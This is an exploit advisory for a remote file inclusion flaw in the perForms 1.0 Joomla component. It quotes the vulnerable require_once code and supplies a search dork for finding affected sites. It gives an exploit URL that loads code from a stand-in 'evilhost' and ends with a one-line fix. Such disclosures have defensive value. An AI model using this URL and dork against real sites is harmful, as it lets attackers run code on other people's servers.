--------------------------------------------------------------------------- perForms <= 1.0 ([mosConfig_absolute_path]) Remote File Inclusion --------------------------------------------------------------------------- Remote : Yes Critical Level : High Vuln founded in a log file: lazy 0day!!! :D Description: ~~~~~~~~~~~~ Application : perForms Joomla Component Version : latest version [1.0] URL : http://forge.joomla.org/sf/projects/performs Variable $mosConfig_absolute_path not sanitized: xpl works with register_globals=on in /components/com_performs/com_performs/performs.php on lines 6-10 require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/lib_template.php" ); require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/lib_valid.php" ); require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/lib_phpForm.php" ); require_once( $mosConfig_absolute_path."/administrator/components/com_performs/lib/myLib.php" ); require_once($mosConfig_absolute_path."/administrator/components/com_performs/class.performs.php"); Exploit: ~~~~~~~~ dork: inurl:"com_performs" -> founds ~12.000 sites (!) http://www.vuln.com/components/com_performs/performs.php?mosConfig_absolute_path=http://evilhost Fix ~~~~ Add before code: defined('_VALID_MOS') or die('Direct access to this location is not allowed.'); Thx ~~~~ Who works for better code and better life! ----------------------------------------------------------------------------------------------------